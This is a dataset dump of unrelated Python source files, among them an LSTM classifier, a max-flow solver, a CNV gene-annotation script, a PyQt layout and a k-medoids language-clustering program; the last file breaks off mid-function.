text stringlengths 38 1.54M |
|---|
import tensorflow as tf
class LSTMClass(tf.keras.Model):
    """Two-layer LSTM text classifier.

    Pipeline: Embedding -> LSTM -> LSTM -> Dense(relu) -> Dense(1).
    The final Dense layer emits one logit per example, matching the
    original intent that the output dimension is 1 for the top-level
    category.
    """

    def __init__(self, **kargs):
        super(LSTMClass, self).__init__()
        # Embedding sized to the current vocabulary.
        self.embedding = tf.keras.layers.Embedding(
            input_dim=kargs['vocab_size'],
            output_dim=kargs['embedding_dimension'])
        # First LSTM returns the full sequence so it can feed the second.
        self.lstm1 = tf.keras.layers.LSTM(units=kargs['lstm_dimension'],
                                          return_sequences=True)
        # BUG FIX: the last LSTM previously used return_sequences=True,
        # which made the Dense layers emit one value per timestep instead
        # of one value per example.  Returning only the final hidden state
        # yields the (batch, 1) classifier output the comments describe.
        self.lstm2 = tf.keras.layers.LSTM(units=kargs['lstm_dimension'],
                                          return_sequences=False)
        self.dense1 = tf.keras.layers.Dense(units=kargs['dense_dimension'],
                                            activation=tf.keras.activations.relu)
        self.dense2 = tf.keras.layers.Dense(1)

    def call(self, x):
        """Forward pass: token ids -> single logit per example."""
        x = self.embedding(x)
        x = self.lstm1(x)
        x = self.lstm2(x)
        x = self.dense1(x)
        x = self.dense2(x)
        return x
# ---- training configuration ----
model_name = "LSTMFC2"
batch_size, num_epoch, valid_split = 128, 50, 0.2

kargs = {
    'vocab_size': 1340241,        # number of words in the full vocabulary
    'embedding_dimension': 50,
    'lstm_dimension': 150,
    'dense_dimension': 150,
}

model = LSTMClass(**kargs)
model.compile(
    optimizer=tf.keras.optimizers.Adam(1e-3),
    # BUG FIX: the model has a single-unit output head, so
    # CategoricalCrossentropy (one column per class) always saw a
    # degenerate one-class problem.  Binary cross-entropy on logits is the
    # matching loss for Dense(1).
    loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
    # BinaryAccuracy (not Accuracy) is the matching metric for a 1-unit head.
    metrics=[tf.keras.metrics.BinaryAccuracy(name='accuracy')]
)

# Use tf.keras callbacks for consistency with the tf.keras model above.
from tensorflow.keras.callbacks import ModelCheckpoint

# BUG FIX: checkpoint_path was never defined, and the undefined
# `earlystop_callback` was passed to fit() instead of the checkpoint
# callback created here.
checkpoint_path = model_name + '_weights.h5'
cp_callback = ModelCheckpoint(
    checkpoint_path, monitor='val_accuracy', verbose=1,
    save_best_only=True, save_weights_only=True
)

# NOTE(review): `df` and `train_inputs` are assumed to be defined earlier in
# the original notebook -- confirm before running.
train_labels = tf.cast(df['Large'], tf.int32)
history = model.fit(x=train_inputs, y=train_labels,
                    batch_size=batch_size, epochs=num_epoch,
                    validation_split=valid_split,
                    callbacks=[cp_callback])
# python3
from collections import deque
def max_flow(n, s, t, c):
    """Compute the maximum s->t flow in an n-node network.

    c is an n x n capacity matrix.  Edmonds-Karp scheme: repeatedly find a
    shortest augmenting path with BFS in the residual graph and push the
    bottleneck capacity along it until the sink becomes unreachable.
    """
    flow = [[0] * n for _ in range(n)]   # current flow on each edge
    total = 0
    while True:
        # BFS for an augmenting path; parent[v] == -1 means unvisited.
        parent = [-1] * n
        parent[s] = -2                   # mark the source as visited
        queue = deque([s])
        while queue and parent[t] == -1:
            node = queue.popleft()
            for nxt in range(n):
                residual = c[node][nxt] - flow[node][nxt]
                if residual > 0 and parent[nxt] == -1:
                    parent[nxt] = node
                    queue.append(nxt)
        if parent[t] == -1:              # sink unreachable: flow is maximal
            break
        # Walk back from the sink to find the bottleneck capacity.
        bottleneck = float("Inf")
        node = t
        while node != s:
            prev_node = parent[node]
            bottleneck = min(bottleneck,
                             c[prev_node][node] - flow[prev_node][node])
            node = prev_node
        # Augment along the path and update reverse residual edges.
        node = t
        while node != s:
            prev_node = parent[node]
            flow[prev_node][node] += bottleneck
            flow[node][prev_node] -= bottleneck
            node = prev_node
        total += bottleneck
    return total
def read_data_test():
    """Read a flow network from the fixture file ``tests/02``.

    First line: vertex and edge counts.  Each following line is an edge
    ``u v capacity`` with 1-based endpoints; parallel edges are merged by
    summing their capacities.

    Returns (vertex_count, edge_count, capacity_matrix).
    """
    # BUG FIX: the file handle was previously opened and never closed.
    with open("tests/02", "r") as fh:
        lines = fh.readlines()
    vertex_count, edge_count = map(int, lines[0].split())
    capacity_matrix = [[0] * vertex_count for _ in range(vertex_count)]
    for line in lines[1:edge_count + 1]:
        u, v, capacity = map(int, line.split())
        capacity_matrix[u - 1][v - 1] += capacity
    return vertex_count, edge_count, capacity_matrix
def read_data():
    """Read a flow network from stdin (same format as read_data_test).

    Returns (vertex_count, edge_count, capacity_matrix).
    """
    vertex_count, edge_count = map(int, input().split())
    capacity_matrix = [[0] * vertex_count for _ in range(vertex_count)]
    for _ in range(edge_count):
        u, v, capacity = map(int, input().split())
        capacity_matrix[u - 1][v - 1] += capacity
    # BUG FIX: removed an unreachable trailing "return graph" statement that
    # referenced an undefined name.
    return vertex_count, edge_count, capacity_matrix
if __name__ == '__main__':
    # Load the sample network (switch to read_data() for stdin input).
    node_count, _, capacities = read_data_test()
    # Source is node 0, sink is the last node.
    result = max_flow(node_count, 0, node_count - 1, capacities)
    print(result)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Usage:
annotation.py call --cnv_fn=IN_FILE [--target_gene_fn=IN_FILE] [--ref=STR] [--out_prefix=STR]
annotation.py -h | --help
Options:
-h --help Show this screen.
--version Show version.
--cnv_fn=IN_FILE Path of SCYN format cnv file.
--target_gene_fn=IN_FILE Path of intersted gene file.
--ref=STR Reference version, [default: hg38]
--out_prefix=STR Path of out file prefix, [default: ./test]
"""
import pickle
import docopt
import pandas as pd
from pybedtools import BedTool
import gzip
import os
from biotool import gene as genetool
from utils import io
###### get bed fn ######
def get_bin_bed(bin_list):
    """Build a BedTool from bins formatted as ``chrom:start-end``."""
    rows = [region.replace(':', '\t').replace('-', '\t') for region in bin_list]
    return BedTool('\n'.join(rows), from_string=True)
def get_cnv_bed(cnv_fn):
    """Load a SCYN-format CNV table and a BedTool over its bin columns.

    Returns (cnv_df, cnv_bed) where cnv_df is indexed by cell_id.
    """
    cnv_df = io.read_cnv_fn(cnv_fn, 'cell_id')
    return cnv_df, get_bin_bed(cnv_df.columns)
def get_gene_bed(ref, use_db=True, target_gene_fn=None):
    """Build a BedTool of gene regions for reference version *ref*.

    With use_db=True only genes present in the bundled db/gene_list files
    (plus target_gene_fn, if given) are kept; otherwise every gene from the
    pickled annotation is emitted.  The BED name field is "<gene>,<ens_id>".
    """
    current_dir, _ = os.path.split(os.path.realpath(__file__))
    fn = os.path.join(current_dir, 'db', 'ens_gene.pickle')
    # BUG FIX: the pickle file handle was opened and never closed.
    with open(fn, 'rb') as fh:
        gene_dict = pickle.load(fh).get(ref + '_gene', {})
    gene_list = []
    if use_db:
        gene_dir = os.path.join(current_dir, 'db', 'gene_list')
        gene_list += genetool.read_gene_list_from_dir(gene_dir)
    if target_gene_fn:
        gene_list += genetool.read_gene_list(target_gene_fn)
    gene_set = set(gene_list)  # O(1) membership instead of list scans
    rows = []
    for gene, region in gene_dict.items():
        if use_db and gene not in gene_set:
            continue
        chrom, start, end, ens_id = region
        rows.append('{}\t{}\t{}\t{}\n'.format(chrom, start, end,
                                              gene + ',' + ens_id))
    # ''.join avoids the quadratic string += of the original.
    return BedTool(''.join(rows), from_string=True)
def process_single_hit(gene, hit, cnv_df, feature_list, data_df, matrix_df):
    """Record one gene/bin overlap.

    hit[3] is "<gene>,<ensembl_id>"; hit[4:7] are the overlapping bin's
    chrom/start/end.  Appends a feature row to feature_list, copies the
    bin's CNV column into matrix_df under the gene name, and returns
    data_df with new (feature index, cell index, copy number) rows.
    """
    gene, ens_id = hit[3].split(',')
    feature_list.append([ens_id, gene, 'CNV Profile'])
    cnv_bed_str = '{}:{}-{}'.format(hit[4], hit[5], hit[6])
    matrix_df[gene] = cnv_df[cnv_bed_str]
    df = pd.DataFrame(data={'0': len(feature_list),
                            '1': cnv_df.index,
                            '2': cnv_df[cnv_bed_str]})
    # BUG FIX: DataFrame.append was deprecated in pandas 1.4 and removed in
    # pandas 2.0; pd.concat is the supported replacement.
    return pd.concat([data_df, df])
def process_hits(gene, hits, cnv_df, feature_list, data_df, matrix_df):
    """Record a gene that overlaps several bins.

    Averages the CNV columns of every overlapping bin, stores the mean
    profile in matrix_df under the gene name, appends one feature row per
    hit, and returns data_df with the new rows appended.
    """
    cnv_bed_str_list = []
    for hit in hits:
        gene, ens_id = hit[3].split(',')
        cnv_bed_str_list.append('{}:{}-{}'.format(hit[4], hit[5], hit[6]))
        feature_list.append([ens_id, gene, 'CNV Profile'])
    mean_df = cnv_df[cnv_bed_str_list].mean(1)
    matrix_df[gene] = mean_df
    df = pd.DataFrame(data={'0': len(feature_list),
                            '1': cnv_df.index,
                            '2': mean_df})
    # BUG FIX: DataFrame.append was removed in pandas 2.0; use pd.concat.
    return pd.concat([data_df, df])
def run_call(cnv_fn=None, target_gene_fn=None, ref=None, out_prefix=None, **args):
    """Annotate CNV bins with genes and write cellranger-style outputs.

    Writes <out_prefix>_barcodes.tsv.gz, _features.tsv.gz, _matrix.mtx.gz
    and _gene_cnv.csv.gz.
    """
    cnv_df, cnv_bed = get_cnv_bed(cnv_fn)
    cnv_df.reset_index(inplace=True)
    cnv_df.index = cnv_df.index + 1  # matrix-market cell indices start at 1
    gene_bed = get_gene_bed(ref, use_db=False)
    feature_list = []
    data_df = pd.DataFrame()
    matrix_df = pd.DataFrame()
    prev_gene = None
    hits = []
    # Group consecutive window hits by gene, flushing each completed group.
    for hit in gene_bed.window(cnv_bed).overlap(cols=[2, 3, 6, 7]):
        gene, _ = hit[3].split(',')
        if prev_gene != gene and hits:
            data_df = process_hits(gene, hits, cnv_df, feature_list, data_df, matrix_df)
            hits = []
        hits.append(hit)
        prev_gene = gene
    # BUG FIX: the hits accumulated for the final gene were previously never
    # processed; flush the last group after the loop.
    if hits:
        data_df = process_hits(prev_gene, hits, cnv_df, feature_list, data_df, matrix_df)
    # output
    cnv_df['cell_id'].to_csv(out_prefix + '_barcodes.tsv.gz', sep='\t', header=False, index=False, compression='gzip')
    feature_df = pd.DataFrame(feature_list)
    feature_df.to_csv(out_prefix + '_features.tsv.gz', sep='\t', header=False, index=False, compression='gzip')
    data_df = data_df.dropna()
    # Header row of the matrix-market body: n_features, n_cells, n_entries.
    df = pd.DataFrame(data={'0': [matrix_df.shape[1]],
                            '1': [matrix_df.shape[0]],
                            '2': [data_df.shape[0]]})
    data_df = pd.concat([df, data_df])
    with gzip.open(out_prefix + '_matrix.mtx.gz', 'w') as f:
        f.write(b'%%MatrixMarket matrix coordinate integer general\n')
        f.write(b'% cellranger-rna matrix format\n')
        f.write(b'% feature index, cell index, copy number profile (index starts with 1)\n')
        f.write(b'% produced by scVar.1.0 \n')
    # mode='a' appends a second gzip member; gzip readers concatenate members.
    data_df.to_csv(out_prefix + '_matrix.mtx.gz', sep=' ', header=False, index=False, compression='gzip', mode='a')
    matrix_df.index = cnv_df['cell_id']
    matrix_df.to_csv(out_prefix + '_gene_cnv.csv.gz', compression='gzip')
def run(call=None, **args):
    """Dispatch to run_call when the ``call`` command was requested."""
    if not call:
        return
    run_call(**args)
if __name__ == "__main__":
    # Strip docopt's leading dashes so keys match run()'s parameter names.
    args = docopt.docopt(__doc__)
    new_args = {key.replace('--', ''): val for key, val in args.items()}
    run(**new_args)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Video4.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_VideoWidget4(object):
    """pyuic5-generated layout: a 2x2 grid of video display labels.

    NOTE: generated from 'Video4.ui'; manual edits are lost when pyuic5
    is run again.
    """

    def setupUi(self, VideoWidget4):
        # Build the widget tree: an outer zero-margin grid holding one
        # container widget, which holds four QLabel video panes in a 2x2 grid.
        VideoWidget4.setObjectName("VideoWidget4")
        VideoWidget4.resize(979, 463)
        self.gridLayout = QtWidgets.QGridLayout(VideoWidget4)
        self.gridLayout.setContentsMargins(0, 0, 0, 0)
        self.gridLayout.setSpacing(0)
        self.gridLayout.setObjectName("gridLayout")
        self.widgetView = QtWidgets.QWidget(VideoWidget4)
        # Container stretches horizontally but keeps a 400px minimum height.
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.widgetView.sizePolicy().hasHeightForWidth())
        self.widgetView.setSizePolicy(sizePolicy)
        self.widgetView.setMinimumSize(QtCore.QSize(0, 400))
        self.widgetView.setObjectName("widgetView")
        self.gridLayout_2 = QtWidgets.QGridLayout(self.widgetView)
        self.gridLayout_2.setSpacing(5)
        self.gridLayout_2.setObjectName("gridLayout_2")
        # Top-left video pane (all panes are capped at 400x200).
        self.label_0 = QtWidgets.QLabel(self.widgetView)
        self.label_0.setMaximumSize(QtCore.QSize(400, 200))
        self.label_0.setStyleSheet("")
        self.label_0.setText("")
        self.label_0.setObjectName("label_0")
        self.gridLayout_2.addWidget(self.label_0, 0, 0, 1, 1)
        # Top-right video pane.
        self.label_1 = QtWidgets.QLabel(self.widgetView)
        self.label_1.setMaximumSize(QtCore.QSize(400, 200))
        self.label_1.setStyleSheet("")
        self.label_1.setText("")
        self.label_1.setObjectName("label_1")
        self.gridLayout_2.addWidget(self.label_1, 0, 1, 1, 1)
        # Bottom-left video pane.
        self.label_2 = QtWidgets.QLabel(self.widgetView)
        self.label_2.setMaximumSize(QtCore.QSize(400, 200))
        self.label_2.setStyleSheet("")
        self.label_2.setText("")
        self.label_2.setObjectName("label_2")
        self.gridLayout_2.addWidget(self.label_2, 1, 0, 1, 1)
        # Bottom-right video pane; additionally uses a Maximum size policy.
        self.label_3 = QtWidgets.QLabel(self.widgetView)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.label_3.sizePolicy().hasHeightForWidth())
        self.label_3.setSizePolicy(sizePolicy)
        self.label_3.setMaximumSize(QtCore.QSize(400, 200))
        self.label_3.setStyleSheet("")
        self.label_3.setText("")
        self.label_3.setObjectName("label_3")
        self.gridLayout_2.addWidget(self.label_3, 1, 1, 1, 1)
        self.gridLayout.addWidget(self.widgetView, 0, 0, 1, 1)
        self.retranslateUi(VideoWidget4)
        QtCore.QMetaObject.connectSlotsByName(VideoWidget4)

    def retranslateUi(self, VideoWidget4):
        # Install translatable strings (only the window title here).
        _translate = QtCore.QCoreApplication.translate
        VideoWidget4.setWindowTitle(_translate("VideoWidget4", "Form"))
|
class HTMLAttrMeta(type):
    """Metaclass that turns each name in ``elements`` into a property.

    For every element name the class gets a backing attribute ``_<name>``
    holding ``{'name': full_attribute_name}`` and a property ``<name>``
    whose getter renders ``name="val"`` (or '' when no value was set) and
    whose setter stores the value.
    """

    def __new__(cls, name, bases, attrs):
        elements = attrs['elements']
        prefix = attrs['prefix']
        for each in elements:
            HTMLAttrMeta.addattr(attrs, each, prefix)
        return type.__new__(cls, name, bases, attrs)

    @staticmethod
    def attr2str(attr):
        """Render an attribute dict as 'name="val"', or '' when unset."""
        if 'val' in attr:
            return "%s=\"%s\"" % (attr['name'], attr['val'])
        return ''

    @staticmethod
    def addattr(attrs, name, prefix):
        """Install the '_<name>' template and '<name>' property in attrs."""
        def getter(self):
            return HTMLAttrMeta.attr2str(getattr(self, '_' + name))

        def setter(self, val):
            # BUG FIX: the setter previously mutated the class-level template
            # dict in place, so setting a value on one instance leaked the
            # value to every other instance of the class.  Store a
            # per-instance copy instead.
            attr = dict(getattr(self, '_' + name))
            attr['val'] = val
            setattr(self, '_' + name, attr)

        if prefix:
            fullname = prefix + '-' + name
        else:
            fullname = name
        attrs['_' + name] = {'name': fullname}
        attrs[name] = property(
            fget=getter,
            fset=setter,
        )
class HTMLAttr(object, metaclass=HTMLAttrMeta):
    """A Python wrapper for HTML attributes.

    Subclassing this base class creates the related attribute wrappers.

    Example:
        class data(HTMLAttr):
            prefix = 'data'
            elements = ['transition']

    renders the string 'data-transition=fade' when an instance is used as a
    string.  Subclasses are initialized from keys listed in ``elements``.
    """
    prefix = ''
    elements = []

    def __init__(self, **meta):
        # Accept only keys the metaclass registered as properties (their
        # getters return '' rather than None, so getattr distinguishes them).
        for key, val in meta.items():
            if getattr(self, key, None) is not None:
                setattr(self, key, val)

    def __repr__(self):
        # Join the rendered, non-empty attribute strings with spaces.
        rendered = (getattr(self, name) for name in self.elements)
        return ' '.join(part for part in rendered if part)
|
# from autograd import grad, hessian
#
# gw = lambda x1, x2: x1**4 + x1**2 + 10*x2**3 + x2
# gradient = grad(gw)
# hessian = hessian(gw)
#
# print(gradient(10.0, 10.0))
# print(hessian)
import numpy as np
# import pickle
# from SAGE_VI import SAGE_VI
# dir = "/Users/shinbo/Desktop/metting/LDA/0. data/20news-bydate/newsgroup_preprocessed.pickle"
# sage = SAGE_VI(dir,5,0.1,10,True)
# sage.train(0.01, 100)
# pickle.dump(sage,open('sage_model.pickle', 'wb'))
# Broadcasting demo: a (3, 1) column vector times a (3, 4) matrix of ones
# repeats each row's value across all four columns.
a = np.arange(1, 4).reshape(3, 1)
b = np.ones((3, 4))
print(a * b)
# Fixed-size cache demo: three slots, all initially empty.
capacity = 3
cache = [None] * capacity
print(cache)
def get(pos):
    """Return the value at 1-based position *pos*, or -1 when out of range.

    A successful read also moves the accessed slot to the back of the cache
    via shift() -- a crude move-to-back/LRU touch.
    """
    global cache
    # BUG FIX: the old bound check (pos > capacity - 1) rejected the last
    # valid slot, and positions below 1 silently wrapped around via
    # Python's negative indexing (get(0) read the final slot).
    if pos < 1 or pos > capacity:
        return -1
    val = cache[pos - 1]
    shift(pos)
    return val
def set(pos, n):
    # Store value n at 1-based position pos.  No bounds checking: pos < 1
    # wraps via negative indexing and pos > capacity raises IndexError.
    # NOTE: shadows the builtin `set`; name kept for backward compatibility.
    global cache
    cache[pos-1] = n
def shift(pos1):
    """Move the entry at 1-based position *pos1* to the back of the cache."""
    global cache
    moved = cache.pop(pos1 - 1)
    cache.append(moved)
# Demo: fill the three slots, then exercise get()'s move-to-back behaviour.
set(1, 3)
print(cache)
set(2, 5)
print(cache)
set(3, 7)
print(cache)
# get(2) returns the stored value and moves that slot to the back.
print(get(2))
print(cache)
print(get(1))
print(cache)
# Out-of-range position: get() returns -1 and leaves the cache untouched.
print(get(9))
print(cache)
#!/usr/bin/python3
import os,sys

# Open (or create) the file for reading and writing via the low-level
# file-descriptor API.
fd = os.open("foo.txt", os.O_RDWR | os.O_CREAT)
# Encode the payload to bytes before writing.
# BUG FIX: the payload variable was previously named `str`, shadowing the
# builtin str type for the rest of the script.
data = "this is test".encode()
os.write(fd, data)
# Close the descriptor.
os.close(fd)
print("关闭文件成功!!")
# -*- coding: utf-8 -*-
"""DB Vocabularies.
$Id$
"""
from zope.interface import implements
from rx.ormlite2.exc import PersistenceError
from rx.ormlite2.dbop import dbquery
from rx.ormlite2.vocabulary.interfaces import IRDBVocabulary
from pyramid.vocabulary.base import ObjectVocabulary
class RDBVocabulary(ObjectVocabulary):
    u"""Vocabulary of objects loaded from the database."""
    implements(IRDBVocabulary)
    select = None  # customized database query; None means "load everything"

    def _load(self):
        # With a custom `select`, load only the matching objects; otherwise
        # load every object of the configured class and skip the per-object
        # type check on creation.
        if self.select is not None:
            self._v_skipObjectTypeCheckOnCreation = False
            params = {}
            return self.objectC.load_many(dbquery(self.select), **params)
        self._v_skipObjectTypeCheckOnCreation = True
        return self.objectC.load_all()

    def _reload(self):
        # Rebuild the token index from a fresh database load.
        self.by_token = self._mappingFactory()
        values = self._load()
        self._reindex_by_token(values)

    def __init__(self, *args, **kwargs):
        # objectC (the persistent object class) must be set by a subclass.
        assert self.objectC is not None
        values = self._load()
        super(RDBVocabulary, self).__init__(values, *args, **kwargs)

    def _dict2token(self, token):
        # Accept a dict of primary-key fields and normalize it into the
        # tuple form used as a vocabulary token.
        if isinstance(token, dict):
            token = tuple([ token[p] for p in self.objectC.p_keys ])
        return token

    def __getitem__(self, token):
        u"""Return the object matching the given token."""
        try:
            return super(RDBVocabulary, self).__getitem__(
                self._dict2token(token))
        except LookupError:
            raise PersistenceError(
                'Object `%s(%s)` is not found' % (self.objectC.__name__, token))

    def getTerm(self, value):
        u"""Return the vocabulary term for the given object."""
        try:
            return super(RDBVocabulary, self).getTerm(value)
        except LookupError:
            raise PersistenceError('Object `%s` is not found' % value)

    def getTermByToken(self, token):
        u"""Return the vocabulary term matching the given token."""
        try:
            return super(RDBVocabulary, self).getTermByToken(
                self._dict2token(token))
        except LookupError:
            raise PersistenceError(
                'Object `%s(%s)` is not found' % (self.objectC.__name__, token))
|
# Minutes in a week: 7 days * 24 hours * 60 minutes.
print(7*24*60)
ilosc_minut = 7*24*60
print("Liczba minut w ciagu 7 dni to:" + str(ilosc_minut))
# BUG FIX: the original BMI line was not valid Python
# ("BMI = (masa (78)) / (wzrost (m))**" -- dangling '**', undefined names).
# Use concrete example values: BMI = mass [kg] / height [m] squared.
masa = 78        # mass in kilograms
wzrost = 1.75    # height in metres
BMI = masa / wzrost ** 2
import random
import numpy as np
import os
from unidecode import unidecode
import matplotlib.pyplot as plt
def read_file(files, n=3):
    """Build per-language n-gram frequency tables.

    Each file is expected to start with the language/country name, followed
    by its text.  Returns a dict mapping language name to a dict of
    n-character substrings and their occurrence counts (default n = 3).
    """
    texts = {}
    for path in files:
        # BUG FIX: the file handle was previously opened and never closed.
        with open(path, "rt", encoding="utf8") as fh:
            raw = fh.read()
        # Turn newlines and basic punctuation into spaces.
        for ch in "\n.,;()":
            raw = raw.replace(ch, " ")
        raw = unidecode(raw)  # normalize accented letters to plain ASCII
        raw = raw.upper()
        # Collapse runs of spaces -- the original chained several
        # space-for-space replaces that appear to have intended this
        # normalization (the literals were garbled in extraction).
        raw = ' '.join(raw.split())
        country_name, _, body = raw.partition(' ')
        counts = {}
        # Count every n-character window.  BUG FIX: the original iterated
        # range(n, len(body)) and therefore always dropped the final n-gram.
        for j in range(n, len(body) + 1):
            gram = body[j - n:j]
            counts[gram] = counts.get(gram, 0) + 1
        texts[country_name] = counts
    return texts
class KMedoidsClustering:
    """k-medoids clustering of languages by cosine distance of n-gram counts.

    ``data`` maps language/country name -> {n-gram: count} (see read_file).
    Pairwise distances are memoized in ``self.distances``.
    """

    def __init__(self, data):
        # data: dict of language name -> n-gram count dict
        self.data = data
        # memoization dictionary
        self.distances = {}

    def get_distance(self, language1, language2):
        """Return the cosine distance between two languages (memoized)."""
        # val1 and val2 are dictionaries of values n-consecutive strings and key that are "country" names
        if language1 in self.distances:
            distance_to = self.distances.get(language1)
            if language2 in distance_to:
                dist = distance_to.get(language2)
                return dist
        # n-consecutive strings of both languages
        val_language1 = self.data.get(language1)
        val_language2 = self.data.get(language2)
        # calculating cosine similarity
        similarity = self.cosine_similarity(val_language1, val_language2)
        distance = 1 - similarity
        # adding language to dict if not present
        if language1 not in self.distances:
            self.distances[language1] = {}
        if language2 not in self.distances:
            self.distances[language2] = {}
        # evaluating distance between languages
        self.distances[language1][language2] = distance
        self.distances[language2][language1] = distance
        return distance

    @staticmethod
    def cosine_similarity(language1, language2):
        """Cosine similarity between two sparse {n-gram: count} vectors."""
        # calculating cosine similarity between two languages
        # intersection of the same n-consecutive strings for dot product
        # common elements (keys) of both dicts
        common = set(language1.keys()) & set(language2.keys())
        # initialize dot product
        dot = 0
        for i in common:
            dot += (language1.get(i) * language2.get(i))
        # calculating the magnitude of vectors
        vector1 = np.array(list(language1.values()))
        vector2 = np.array(list(language2.values()))
        norm_vector1 = np.sqrt(np.sum(vector1 ** 2))  # square root of sum of square element in values of vector1
        norm_vector2 = np.sqrt(np.sum(vector2 ** 2))  # square root of sum of square element in values of vector2
        # cosine similarity
        cos = dot / (norm_vector1 * norm_vector2)
        return cos

    def select_randomly(self, k=2):
        """Pick k distinct random languages as initial group leaders."""
        list_of_languages = list(self.data.keys())
        random_leaders = []
        while len(random_leaders) != k:
            leader = random.choice(list_of_languages)
            if leader not in random_leaders:
                random_leaders.append(leader)
        groups = {}
        for leader in random_leaders:
            groups.update({leader: set()})
        return groups

    def reorganize_groups(self, groups):
        """Reassign every language to its most similar leader (in place)."""
        # ----------- CREATING NEW GROUPS BECAUSE LEADERS MIGHT CHANGE ----------- #
        # iterate over all languages and see which leader it belongs
        for i in self.data:
            max_similarity = -1
            # remove element from current group and put it next to the right leader
            for leader in groups.keys():
                if i in groups.get(leader):
                    groups[leader].remove(i)
            belong_to = "None"  # currently belong to nobody
            # iterate over leaders and calculating cosine distance between current language and leader language
            for leader in groups.keys():
                distance = self.get_distance(i, leader)  # cosine distance
                similarity = 1 - distance  # cosine similarity
                if max_similarity < similarity:
                    max_similarity = similarity
                    belong_to = leader
            # update current language (i) to leader who is most similar (belong_to)
            groups[belong_to].update([i])
        return groups

    def recalculate_leaders(self, groups):
        """Pick each group's new medoid (minimum total intra-group distance)."""
        # ----- RECALCULATING WHO ARE THE LEADERS BECAUSE GROUPS MIGHT HAVE CHANGED ----- #
        new_groups = {}  # new dict because we cannot change one (groups) in loop
        # iterate over all groups
        for leader in groups.keys():
            group = groups.get(leader)
            dist = 0
            min_dist = -1
            new_leader = "None"
            # iterate over all elements in group and calculating
            # the distance from all elements to all other elements
            for i in group:
                for j in group:
                    if i != j:
                        dist += self.get_distance(i, j)  # cosine distance
                # choosing min distance from element to all other elements as the new leader
                if min_dist == -1 or dist < min_dist:
                    min_dist = dist
                    new_leader = i
                dist = 0
            # setting current group new leader
            new_groups[new_leader] = group
        return new_groups

    def k_medoids(self, k=2):
        """Run k-medoids until the set of leaders stops changing."""
        # choose k random languages
        groups = self.select_randomly(k)
        old_groups = {}  # for saving previous state of groups
        # while loop until the groups remain the same
        while groups.keys() != old_groups.keys():
            # save current groups to old_groups for comparison in while loop
            old_groups = groups
            # ----------- CREATING NEW GROUPS BECAUSE LEADERS MIGHT HAVE CHANGED ------------ #
            groups = self.reorganize_groups(groups)
            # ----- RECALCULATING WHO ARE THE LEADERS BECAUSE GROUPS MIGHT HAVE CHANGED ----- #
            groups = self.recalculate_leaders(groups)
        return groups

    def silhouette(self, groups):
        """Average silhouette score of the clustering (singletons score 0)."""
        all_silhouettes = []  # storing silhouettes from each data point
        for leader in groups.keys():
            cluster = groups.get(leader)
            # ---- if only one element in cluster silhouette score is zero ---- #
            if len(cluster) < 2:
                s = 0
                all_silhouettes.append(s)
                continue
            # calculating silhouette score for each data point
            for i in cluster:
                # ---- initialization of a(i) and b(i) ----- #
                a = 0  # a(i)
                b = 0  # b(i)
                # ---------- CALCULATING a(i) ---------- #
                # calculating distance from data point i to all others points in group
                for j in cluster:
                    if i != j:
                        a += self.get_distance(i, j)  # cosine distance
                # normalization of a(i)
                a /= (len(cluster) - 1)
                # ---------- CALCULATING b(i) ---------- #
                # calculating to other clusters
                all_b = []  # for saving all b(i) to other clusters and than choosing the min
                for other_clusters_leader in groups.keys():
                    tmp_b = 0
                    if other_clusters_leader != leader:
                        other_cluster = groups.get(other_clusters_leader)
                        for j in other_cluster:
                            tmp_b += self.get_distance(i, j)  # cosine distance
                        # normalization of tmp_b
                        tmp_b /= len(other_cluster)
                        all_b.append(tmp_b)
                b = min(all_b)
                # ----- SILHOUETTE ----- #
                s = (b - a) / max(a, b)  # silhouette score of one data point
                all_silhouettes.append(s)
        # calculating the average silhouette score
        silhouette_score = sum(all_silhouettes) / len(all_silhouettes)
        return silhouette_score

    def run(self):
        """Cluster 1000 times at k=5, report best/worst runs and a histogram."""
        k = 5
        all_silhouette_scores = []
        # storing the best and worst clusters and their silhouettes
        worst_silhouette_score = 1
        worst_clusters = {}
        best_silhouette_score = 0
        best_clusters = {}
        for i in range(0, 1000):
            clusters = self.k_medoids(k)
            silhouette_score = self.silhouette(clusters)
            all_silhouette_scores.append(silhouette_score)
            if silhouette_score < worst_silhouette_score:
                worst_silhouette_score = silhouette_score
                worst_clusters = clusters
            if silhouette_score > best_silhouette_score:
                best_silhouette_score = silhouette_score
                best_clusters = clusters
        # printing best and worst clusters
        print("--------------- BEST CLUSTERS ---------------")
        self.print_clusters(best_clusters, best_silhouette_score, "best")
        print("--------------- WORST CLUSTERS ---------------")
        self.print_clusters(worst_clusters, worst_silhouette_score, "worst")
        # --------- HISTOGRAM ---------
        self.plot_hist(all_silhouette_scores)
        print("--------------- LANGUAGE PREDICTION ---------------")
        self.find_language(best_clusters, "OSONCJE")

    @staticmethod
    def plot_hist(all_silhouette_scores):
        """Histogram of silhouette scores over all runs."""
        # plotting
        plt.hist(all_silhouette_scores, bins=50, range=(0, 1), edgecolor='black')
        plt.title("A histogram of the frequency of silhouette values at k = 5")
        plt.ylabel("Frequency")
        plt.xlabel("Silhouette score")
        plt.show()

    @staticmethod
    def print_clusters(clusters, silhouette_score, name):
        """Print every cluster's members and the overall silhouette score."""
        for leader in clusters.keys():
            group = clusters.get(leader)
            print(group)
            print()
        print("Silhouette score for " + name + " clusters: ", silhouette_score)
        print()

    def find_language(self, clusters, name):
        """Print the top-3 most similar languages to *name* within its cluster."""
        similarities = []  # for storing the similarity values
        languages = []  # for storing which language
        # calculating similarities
        for leader in clusters.keys():
            group = clusters.get(leader)
            if name in group:
                for i in group:
                    if i != name:
                        similarity = 1 - self.get_distance(name, i)
                        similarities.append(similarity)
                        languages.append(i)
        # preparing for printing out the top 3 probabilities
